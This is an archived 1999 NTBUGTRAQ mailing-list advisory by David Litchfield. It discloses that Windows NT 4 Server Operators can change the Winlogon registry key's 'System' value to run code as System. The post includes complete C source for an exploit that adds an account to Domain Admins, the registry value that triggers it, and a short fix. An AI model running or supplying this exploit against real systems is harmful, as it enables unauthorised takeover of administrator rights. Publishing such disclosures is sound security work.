Everhart, Glenn
From:	mnemonix [mnemonix@GLOBALNET.CO.UK]
Sent:	Monday, January 11, 1999 3:30 PM
To:	NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject:	Default permissions on Registry key creates a getadmin hole
Summary: There is an interesting hole opened up in the winlogon registry key
on NT 4 that allows elevation of privileges to both local and global
Administrator level.

Details: The following registry key permissions are set to "Server
perator"  -  Special Access. Part of this access gives them the "Set Value"
permission.

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

One of the pre-existing values for this key is "System:REG_SZ:lsass.exe". A
server operator may change this value to what they wish in an effort to gain
Admin rights. Anything they place here will be run with System privileges.
However, there are a couple of problems:
Firstly any exectuable ran from here in non-interactive so there is no point
in running usrmgr.exe or cmd.exe
Secondly it seems that any executeable run from here with arguments fails eg
"cmd.exe /c copy file.ext newfile.ext"
Thirdly it seems that the SAM is locked Read-Only temporarily after the SAS
keystroke is entered (Ctrl+Alt+Del)

What is needed then is an executable that requires no arguments, that pauses
long enough for the SAM to become writable again and gives the attacker
local and global Admin rights. The following code meets those requirements.
Replace "acc_name" with the relevant account name.

-----------------------8<-------------------------------------------------

/* GetadmforSops.exe - David Litchfield 11 Jan 1999 */
/* Compile with eg Visual C++ and link with netapi32.lib */

#define UNICODE
#include <windows.h>
#include <wchar.h>
#include <lmaccess.h>
#include <winbase.h>

int __cdecl wmain (void)
{
 LPWSTR group = L"Domain Admins";
 LPWSTR acc = L"acc_name";

 NET_API_STATUS nas=0;

 _sleep(180000);
  if( (nas=NetGroupAddUser(NULL, group, acc)) == 0)
  {
   wprintf(L"Success");
   return 0;
  }
   return 0;
}

----------------------->8------------------------------------------------

Set the System value to :
System:REG_SZ:lsass,c:\FULL_PATH_TO\getadmforsops.exe and reboot the system.
Three minutes later "acc_name" is made a member of the "Domain Admins" group
wich is also a member of the local Administrators group.

Fix: If you can trust your "Server Operators" then you don't need to do
much - if you'd prefer to be more safe however remove the "Set Value"
permission to this key.

This was tested of NT Service pack 3 with hotfixes - though it will almost
certainly work on NT 4 with SP 4 unless the SP changes the permissions on
the winlogon registry key.

Cheers
David Litchfield

http://www.infowar.co.uk/mnemonix/                                                                                                                                                                                                                                                                                 